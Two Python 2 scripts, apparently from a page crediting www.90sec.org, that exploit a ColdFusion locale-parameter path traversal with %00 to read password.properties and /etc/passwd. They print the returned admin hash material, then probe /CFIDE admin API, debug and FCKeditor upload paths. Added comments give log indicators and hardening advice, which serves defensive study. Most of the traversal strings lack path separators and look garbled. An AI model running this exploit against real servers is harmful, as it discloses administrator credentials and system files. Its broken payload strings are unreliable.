#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Python 2 script (print statements, urllib.urlopen, httplib).
#
# What the code below does against the base URL passed as sys.argv[1]:
#   1. run() requests /CFIDE/administrator/enter.cfm with a series of `locale`
#      values that end in %00en and name password.properties or passwd, and
#      prints whatever comes back inside the response's <title> element.
#   2. scanner() requests a fixed list of /CFIDE paths and prints the ones
#      that answer 200, 403 or 500.
#
# Defender notes: in web or proxy logs this appears as a run of GETs to
# enter.cfm whose `locale` parameter carries dot runs and %00, followed by GETs
# to the /CFIDE/adminapi, /CFIDE/debug and FCKeditor connector paths using the
# fixed User-Agent set in scanner(). Limiting /CFIDE/administrator and
# /CFIDE/adminapi to trusted networks, and rejecting NUL bytes and traversal
# sequences in `locale` at the edge, addresses both phases. The script strips
# `rdspassword=` and `encrypted=true` from the output, so the targeted file
# presumably holds stored password material; if such a request returned file
# content, treat those credentials as disclosed and rotate them.
import sys
import threading
import urllib
import httplib


class Mythread(threading.Thread):
    """Thread that probes one host: locale-parameter file reads, then a path check.

    Only one instance is started by the entry point at the bottom of the
    script, so the thread adds no concurrency in the code visible here.
    """

    def __init__(self,host):
        """Store the base URL (scheme + host) that every request is built from."""
        threading.Thread.__init__(self)
        self.host = host

    def run(self):
        """Request each `locale` variant and print the text found in <title>.

        The whole loop sits inside one try block, so the first failure of any
        kind (connection error, or an IndexError when the response has no
        <title> element) ends the loop and prints "Error connect time".
        """
        # Candidate `locale` values. Most entries, as they appear on the page,
        # contain runs of dots with no path separator; only one entry shows
        # `../` segments. The literals are kept exactly as found, so log
        # matching should key on the endpoint, the `locale` parameter and %00
        # rather than on these exact strings.
        urls = ['/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=................libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..............libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=............libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..........libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=........libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=......libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=....libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=................CFusionMXlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=................CFusionMX7libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=....................JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..................JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=................JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..............JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=............JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..........JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=........JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en',
                '/CFIDE/administrator/enter.cfm?locale=....JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libetcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=................ColdFusion8etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=................etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=..............etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=............etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=..........etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=........etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=......etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=....etcpasswd%00en']
        try:
            for path in urls:
                # Take the text between <title> and </title>, then blank out the
                # two literal markers so that only the remaining value is shown.
                out = urllib.urlopen(self.host + path).read().split(r'</title>')[0].split(r'<title>')[1].replace(r'rdspassword=', ' ').replace(r'encrypted=true', ' ')
                print out
        except Exception:
            # Every failure is reported with this one message; the cause is not
            # distinguished.
            print "Error connect time"
        # NOTE(review): the page lost its indentation; placing this call after
        # the try/except (rather than inside the except branch) is an
        # assumption - confirm against the original file.
        self.scanner()

    def scanner(self):
        """Request a fixed list of /CFIDE paths and print those answering 200, 500 or 403.

        A new connection is opened for every path and is never closed
        explicitly. No timeout is passed to the connection.
        """
        #self.host = host
        # Paths under /CFIDE/adminapi and /CFIDE/debug plus an FCKeditor upload
        # connector. A server that does not need these reachable from untrusted
        # networks can block them outright.
        cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm',
                  '/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm',
                  '/CFIDE/adminapi/_datasource/geturldefaults.cfm',
                  '/CFIDE/adminapi/_datasource/setdsn.cfm',
                  '/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm',
                  '/CFIDE/adminapi/_datasource/setsldatasource.cfm',
                  '/CFIDE/adminapi/customtags/l10n.cfm',
                  '/CFIDE/debug/cf_debugFr.cfm',
                  '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm']
        # Fixed request headers; the static User-Agent string is a usable log
        # indicator for this script when combined with the path list above.
        i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain"}
        for fckpath in cfmfck:
            # Choose the connection class from the scheme prefix and strip the
            # scheme so that only the host part is passed to httplib.
            if self.host[0:8] == "https://":
                conn = httplib.HTTPSConnection(self.host.replace("https://",""))
            else:
                conn = httplib.HTTPConnection(self.host.replace("http://",""))
            conn.request('GET',fckpath,headers = i_headers)
            r1 = conn.getresponse()
            # 200, 500 and 403 are all reported; any other status is ignored.
            if r1.status == 200 or r1.status == 500 or r1.status == 403:
                print self.host + fckpath + " " + str(r1.status)


if __name__ == "__main__":
    # One thread for the single host given on the command line.
    Mythread(sys.argv[1]).start()
#!/usr/bin/env python
# -*- coding: utf8 -*-
# Second Python 2 script on the page; a flat variant of the same two-phase
# check. Phase one requests /CFIDE/administrator/enter.cfm with `locale` values
# ending in %00en and prints the text found in the response <title>; phase two
# requests a fixed list of /CFIDE paths and prints those answering 200, 403 or
# 500.
#
# Defender notes: the log pattern is a run of GETs to enter.cfm with dot runs
# and %00 in `locale`, then GETs to /CFIDE/adminapi, /CFIDE/debug and the
# FCKeditor connector. This variant sends no custom headers, so httplib and
# urllib defaults apply. Limiting /CFIDE/administrator and /CFIDE/adminapi to
# trusted networks and rejecting NUL bytes and traversal sequences in `locale`
# addresses both phases.
#
# `subprocess` is imported but not used in the code visible here.
import sys , urllib , httplib , subprocess


def banner():
    """Print the usage banner."""
    # The banner text is kept exactly as it appears on the page; its original
    # line layout was lost when the page was collapsed.
    print """ #--------------------------------------------------# # Welcome to www.90sec.org # # THis is read ColdFusion sha1 Tool # # python COldFusion.py www.WebSite.cn # #--------------------------------------------------# """


# Candidate `locale` values. As they appear on the page, every entry contains
# runs of dots with no path separator. The literals are kept exactly as found,
# so log matching should key on the endpoint, the `locale` parameter and %00
# rather than on these exact strings.
urls = ['/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=................libpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..............libpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=............libpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..........libpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=........libpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=......libpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=....libpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=................CFusionMXlibpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=................CFusionMX7libpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=....................JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..................JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=................JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..............JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=............JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=..........JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=........JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=....JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
        '/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libetcpasswd%00en',
        '/CFIDE/administrator/enter.cfm?locale=................ColdFusion8etcpasswd%00en',
        '/CFIDE/administrator/enter.cfm?locale=................etcpasswd%00en',
        '/CFIDE/administrator/enter.cfm?locale=..............etcpasswd%00en',
        '/CFIDE/administrator/enter.cfm?locale=............etcpasswd%00en',
        '/CFIDE/administrator/enter.cfm?locale=..........etcpasswd%00en',
        '/CFIDE/administrator/enter.cfm?locale=........etcpasswd%00en',
        '/CFIDE/administrator/enter.cfm?locale=......etcpasswd%00en',
        '/CFIDE/administrator/enter.cfm?locale=....etcpasswd%00en']
# Paths under /CFIDE/adminapi and /CFIDE/debug plus an FCKeditor upload
# connector, checked only for their HTTP status.
cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm',
          '/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm',
          '/CFIDE/adminapi/_datasource/geturldefaults.cfm',
          '/CFIDE/adminapi/_datasource/setdsn.cfm',
          '/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm',
          '/CFIDE/adminapi/_datasource/setsldatasource.cfm',
          '/CFIDE/adminapi/customtags/l10n.cfm',
          '/CFIDE/debug/cf_debugFr.cfm',
          '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm']
# NOTE(review): the page lost its indentation; the nesting below is the most
# natural reading of the statement order - confirm against the original file.
try:
    # A missing argument raises IndexError here and lands in the except branch.
    host = sys.argv[1]
    # Compares an int with the string '0'. Under CPython 2's mixed-type
    # ordering an int sorts before a str, so this looks like it is true for
    # every host and the banner is always printed - TODO confirm intent.
    if len(host) < '0':
        banner()
    for url in urls:
        context = urllib.urlopen(host + url).read()
        # Text between <title> and </title>, with the two literal markers
        # blanked out. A response without <title> raises IndexError, which the
        # except branch below turns into banner + exit.
        out = context.split(r'</title>')[0].split(r'<title>')[1].replace(r'rdspassword=', ' ').replace(r'encrypted=true', ' ')
        print out
except Exception:
    # Any failure in phase one prints the banner and exits, so phase two runs
    # only when every request above succeeded.
    banner()
    sys.exit()
else:
    for line in cfmfck:
        # Only an "http://" prefix is stripped and only HTTPConnection is used,
        # so this loop speaks plain HTTP.
        host = host.replace("http://","")
        line = line.replace(" ","")
        # Each cfmfck entry already starts with "/", so the requested path
        # begins with "//".
        line = "/" + line
        website = host + line
        # A new connection per path; it is never closed explicitly and no
        # timeout is passed.
        connection = httplib.HTTPConnection(host)
        connection.request("GET",line)
        response = connection.getresponse()
        # Only 200, 403 and 500 are reported; other statuses are ignored.
        if response.status == 200:
            print website , '200'
        elif response.status == 403:
            print website , '403'
        elif response.status == 500:
            print website , 'server ERROR'